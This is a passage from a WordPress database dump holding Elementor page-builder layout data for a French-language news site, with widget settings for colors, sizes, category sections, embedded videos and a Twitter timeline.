5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2344,756,'_elementor_version','0.4'),(2345,756,'_elementor_css','a:3:{s:4:\"time\";i:1509370162;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2347,757,'_elementor_edit_mode','builder'),(2348,757,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_bo